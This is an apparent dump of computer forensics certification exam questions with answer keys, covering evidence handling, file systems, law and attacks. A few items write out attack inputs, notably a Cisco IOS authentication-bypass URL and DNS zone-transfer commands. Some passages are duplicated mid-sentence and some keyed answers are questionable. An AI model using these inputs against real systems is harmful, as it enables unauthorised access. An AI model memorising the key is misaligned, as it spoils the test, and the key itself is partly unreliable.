QUESTION 303 Why would you need to find out the gateway of a device when investigating a wireless attack? A. The gateway will be the IP of the proxy server used by the attacker to launch the attack B. The gateway will be the IP of the attacker computerThe gateway will be the IP of the attacker? computer C. The gateway will be the IP used to manage the RADIUS server D. The gateway will be the IP used to manage the access point

Answer: D

QUESTION 305 Before you are called to testify as an expert, what must an attorney do first? A. engage in damage control B. prove that the tools you used to conduct your examination are perfect C. read your curriculum vitae to the jury D. qualify you as an expert witness

Answer: D

QUESTION 309 This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court. A. Civil litigation testimony B. Expert testimony C. Victim advocate testimony D. Technical testimony

Answer: D

QUESTION 312 In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze? A. one who has NTFS 4 or 5 partitions B. one who uses dynamic swap file capability C. one who uses hard disk writes on IRQ 13 and 21 D. one who has lots of allocation units per block or cluster

Answer: D

QUESTION 316 What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled? A. ARP redirect B. Physical attack C. Digital attack D. Denial of service

Answer: D

QUESTION 322 What type of analysis helps to identify the time and sequence of events in an investigation? A. Time-based B. Functional C. Relational D. Temporal

Answer: D

QUESTION 328 In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data. A. Network Forensics B. Data Recovery C. Disaster Recovery D. Computer Forensics

Answer: D

QUESTION 33 An Internet standard protocol (built on top of TCP/IP) that assures accurate synchronization to the millisecond of computer clock times in a network of computers. Which of the following statement is true for NTP Stratum Levels? A. Stratum-0 servers are used on the network; they are not directly connected to computers which then operate as stratum-1 servers B. Stratum-1 time server is linked over a network path to a reliable source of UTC time such as GPS, WWV, or CDMA transmissions C. A stratum-2 server is directly linked (not over a network path) to a reliable source of UTC time such as GPS, WWV, or CDMA transmissions D. A stratum-3 server gets its time over a network link, via NTP, from a stratum-2 server, and so on

Answer: D

QUESTION 415 Lance wants to place a honeypot on his network. Which of the following would be your recommendations? A. Use a system that has a dynamic addressing on the network B. Use a system that is not directly interacing with the router C. Use it on a system in an external DMZ in front of the firewall D. It doesn't matter as all replies are faked

Answer: D

QUESTION 333 The use of warning banners helps a company avoid litigation by overcoming an employees assumed _________ when connecting to the company intranet, network, or virtual private network (VPN) and will allow the company investigators to monitor, search, and retrievecompany? intranet, network, or virtual private network (VPN) and will allow the company? investigators to monitor, search, and retrieve information stored within the network. A. Right to work B. Right of free speech C. Right to Internet access D. Right of privacy

Answer: D

QUESTION 338 After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What countermeasures could he take to prevent DDoS attacks? A. Enable BGP B. Enable direct broadcasts C. Disable BGP D. Disable direct broadcasts

Answer: D

QUESTION 344 Click on the Exhibit Button Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE Unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up-to-date and all the other security settings are as stringent as possible. Paulette presents the following screenshot to her boss so he can inform the client about necessary changes need to be made. From the screenshot, what changes should the client company make? A. The banner should include the Cisco tech support contact information as well B. The banner should have more detail on the version numbers for the networkeQuipment C. The banner should not state "only authorized IT personnel may proceed" D. Remove any identifying numbers, names, or version information

Answer: D

QUESTION 350 If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude? A. The system has been compromised using a t0rnrootkit B. The system administrator has created an incremental backup C. The system files have been copied by a remote attacker D. Nothing in particular as these can be operational files

Answer: D

QUESTION 351 You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing? A. Oligomorhic B. Transmorphic C. Polymorphic D. Metamorphic

Answer: D

QUESTION 365 Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers. Bill protects the PDF documents with a password and sends them to their intended recipients. Why PDF passwords do not offer maximum protection? A. PDF passwords are converted to clear text when sent through E-mail B. PDF passwords are not considered safe by Sarbanes-Oxley C. When sent through E-mail, PDF passwords are stripped from the document completely D. PDF passwords can easily be cracked by software brute force tools

Answer: D

QUESTION 366 Madison is on trial for allegedly breaking into her university internal network. The police raided her dorm room and seized all of her computerMadison is on trial for allegedly breaking into her university? internal network. The police raided her dorm room and seized all of her computer equipment. Madison lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment isequipment. Madison? lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madison lawyer trying to prove the police violated?Madison? lawyer trying to prove the police violated? A. The 10th Amendment B. The 5th Amendment C. The 1st Amendment D. The 4th Amendment

Answer: D

QUESTION 371 Using Linux to carry out a forensics investigation, what would the following command accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror A. Search for disk errors within an image file B. Backup a disk to an image file C. Copy a partition to an image file D. Restore a disk from an image file

Answer: D

QUESTION 372 While looking through the IIS log file of a web server, you find the following entries: What is evident from this log file? A. Web bugs B. Cross site scripting C. Hidden fields D. SQL injection is possible

Answer: D

QUESTION 374 You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might ;QUESTION wheather evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab? A. Sign a statement attesting that the evidence is the same as it was when it entered the lab B. There is no reason to worry about this possible claim because state labs are certified C. Make MD5 hashes of the evidence and compare it to the standard database developed by NIST D. Make MD5 hashes of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

Answer: D

QUESTION 378 What are the security risks of running a "repair" installation for Windows XP? A. Pressing Shift+F1 gives the user administrative rights B. Pressing Ctrl+F10 gives the user administrative rights C. There are no security risks when running the "repair" installation for Windows XP D. Pressing Shift+F10 gives the user administrative rights

Answer: D

QUESTION 380 When an investigator contacts by telephone the domain administrator or controller listed by a whois lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records? A. Title 18, Section 1030 B. Title 18, Section 2703(d) C. Title 18, Section Chapter 90 D. Title 18, Section 2703(f)

Answer: D

QUESTION 386 What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture? A. Copyright B. Design patent C. Trademark D. Utility patent

Answer: D

QUESTION 40 Which one of the following is not a consideration in a forensic readiness planning checklist? A. Define the business states that need digital evidence B. Identify the potential evidence available C. Decide the procedure for securely collecting the evidence that meets the requirement fn a forensically sound manner D. Take permission from all employees of the organization

Answer: D

QUESTION 417 Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here? A. Send DOS commands to crash the DNS servers B. Perform DNS poisoning C. Enumerate all the users in the domain D. Perform a zone transfer

Answer: D

QUESTION 425 If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude? A. The system files have been copied by a remote attacker B. The system administrator has created an incremental backup C. The system has been compromised using a t0rn rootkit D. Nothing in particular as these can be operational files

Answer: D

QUESTION 441 The police believe that Mevin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers, and educational institutions. They also suspect that he has been stealing, copying, and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspect door and searching his home and seizing all of his computer equipment if they haveis preventing the police from breaking down the suspect? door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant? A. The USA Patriot Act B. The Good Samaritan Laws C. The Federal Rules of Evidence D. The Fourth Amendment

Answer: D

QUESTION 448 You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environment 5+ years experience in Exchange 2000/2003 environment Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are reQuired MCSA desired, MCSE, CEH preferred No Unix/Linux Experience needed What is this information posted on the job website considered? A. Trade secret B. Social engineering exploit C. Competitive exploit D. Information vulnerability

Answer: D

QUESTION 454 You are a security analyst performing a penetration tests for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers: http://172.168.4.131/level/99/exec/show/config After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered? A. URL Obfuscation Arbitrary Administrative Access Vulnerability B. HTML Configuration Arbitrary Administrative Access Vulnerability C. Cisco IOS Arbitrary Administrative Access Online Vulnerability D. HTTP Configuration Arbitrary Administrative Access Vulnerability

Answer: D

QUESTION 466 You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as other members of your team collect it. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case? A. All forms should be placed in an approved secure container because they are now primary evidence in the case B. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file C. All forms should be placed in the report file because they are now primary evidence in the case D. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container

Answer: D

QUESTION 467 When using Windows acquisitions tools to acquire digital evidence, it is important to use a welltested hardware write-blocking device to _________ A. Automate collection from image files B. Avoiding copying data from the boot partition C. Acquire data from the host-protected area on a disk D. Prevent contamination to the evidence drive

Answer: D

QUESTION 479 Smith, as a part his forensic investigation assignment, has seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM card) data the mobile device. Smith found that the SIM was protected by a Personal identification Number (PIN) code but he was also aware that people generally leave the PIN numbers to the defaults or use easily guessable numbers such as 1234. He unsuccessfully tried three PIN numbers that blocked the SIM card. What Jason can do in this scenario to reset the PIN and access SIM data? A. He should contact the device manufacturer for a Temporary Unlock Code (TUK) to gain access to the SIM B. He cannot access the SIM data in this scenario as the network operators or device manufacturers have no idea about a device PIN C. He should again attempt PIN guesses after a time of 24 hours D. He should ask the network operator for Personal Unlock Number (PUK) to gain access to the SIM

Answer: D

QUESTION 487 The need for computer forensics is highlighted by an exponential increase in the number of cybercrimes and litigations where large organizations were involved. Computer forensics plays an important role in tracking the cyber criminals. The main role of computer forensics is to: A. Maximize the investigative potential by maximizing the costs B. Harden organization perimeter security C. Document monitoring processes of employees of the organization D. Extract, process, and interpret the factual evidence so that it proves the attacker's actions in the court

Answer: D

QUESTION 488 First responder is a person who arrives first at the crime scene and accesses the victim's computer system after the incident. He or She is responsible for protecting, integrating, and preserving the evidence obtained from the crime scene. Which of the following is not a role of first responder? A. Identify and analyze the crime scene B. Protect and secure the crime scene C. Package and transport the electronic evidence to forensics lab D. Prosecute the suspect in court of law

Answer: D

QUESTION 73 In which step of the computer forensics investigation methodology would you run MD5 checksum on the evidence? A. Obtain search warrant B. Evaluate and secure the scene C. Collect the evidence D. Acquire the data

Answer: D

QUESTION 84 Windows Security Event Log contains records of login/logout activity or other security- related events specified by the system's audit policy. What does event ID 531 in Windows Security Event Log indicates? A. A user successfully logged on to a computer B. The logon attempt was made with an unknown user name or a known user name with a bad password C. An attempt was made to log on with the user account outside of the allowed time D. A logon attempt was made using a disabled account

Answer: D

QUESTION 85 Task list command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer. Which of the following task list commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process? A. tasklist/s B. tasklist/u C. tasklist/p D. tasklist/V

Answer: D

QUESTION 362 To calculate the number of bytes on a disk, the formula is: CHS** A. number of circles x number of halves x number of sides x 512 bytes per sector B. number of cylinders x number of halves x number of shims x 512 bytes per sector C. number of cells x number of heads x number of sides x 512 bytes per sector D. number of cylinders x number of heads x number of sides x 512 bytes per sector

Answer: D Explanation: Although D in this ;QUESTION is probably the closest, the Answer may have been transcribed incorrectly. CHS stands for Cylinder Head Sector, and S is not sides. Each side of a platter of a disk has its own head. A cylinder is an alignment of all tracks under one head position. So the Answer is number of cylinders x number of heads x number of sectors (per track) x 512 bytes per sector (assuming that is the sector size as some disks may have larger sector sizes). The number of tracks per side of disk, or the number of tracks that a single head can access is equal to the number of cylinders.

QUESTION 302 What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime? A. forensic duplication of hard drive B. analysis of volatile data C. comparison of MD5 checksums D. review of SIDs in the Registry

Answer: D Explanation: Not MD5: MD5 checksums are used as integrity checks User accounts are assigned a unique SID, and the SID are not reused.

QUESTION 297 Which response organization tracks hoaxes as well as viruses? A. NIPC B. FEDCIRC C. CERT D. CIAC

Answer: D Explanation: Note: CIAC (Computer Incident Advisory Capability) Was run by the US Department of energy

QUESTION 247 John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this? A. The SID of Hillary network account B. The SAM file from Hillary computer C. The network shares that Hillary has permissions D. Hillary network username and password hash

Answer: D Explanation: Note: From the we would have to assume that John is not the Administrator, since he needs to run L0phtcrack in sniffing mode. But what if the company is using switches instead of Hubs? John would either try to degarde the switch or perform a man in the middle attack.

QUESTION 308 When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database. A. A Capital X B. A Blank Space C. The Underscore Symbol D. The lowercase Greek Letter Sigma (s)

Answer: D Explanation: When a file is deleted, the first byte is replaced with 0xE5 to marked the file as deleted or erased, and is the same for FAT12/16/32. An 0xE5 translates also to a ASCII 229, a "O" with a tilde. However, using the greek alphabet (see: http://www.ascii.ca/iso8859.7.htm) the ASCII code 229 is "the lowercase Greek Letter Epsilon, and Ascii code 243 is Lower case Greek Letter Sigma. http://chexed.com/ComputerTips/asciicodes.php says that Ascii 229 is Lowercase Greek Letter Sigma So, although D looks like the correct Answer here, it may require more understanding of the underlying intent of the ;QUESTION.

QUESTION 367 What file structure database would you expect to find on floppy disks? A. NTFS B. FAT32 C. FAT16 D. FAT12

Answer: D Explanation: NTFS is not designed for removable media, although used on some removable media that is very large, never for floppy disks. FAT32 has a minimum space requirement which is larger than floppy disks FAT16 would seem like a logical choice, but is not usually used on floppies FAT12 would be on floppy disks, and probably not seen on anything else. Since floppy disk media is small in size (less than 2 MB), a FAT12 file system has lower overhead and is more efficient.

QUESTION 345 In a FAT32 system, a 123 KB file will use how many sectors? A. 34 B. 25 C. 11 D. 56 E. 246

Answer: E Explanation: If you assume that we are using 512 bytes sectors, then 123x1024/512 = 246 sectors would be needed.


Ensembles d'études connexes

chapter 7: management, leadership, and employee empowerment

View Set

True or False (Quiz ni maam bonete)

View Set

Peds success ch.12 Orthopedic Disorders

View Set

Week 4 practice - ethical and legal thought

View Set

ch 11 facial bones, orbits, nasal bones

View Set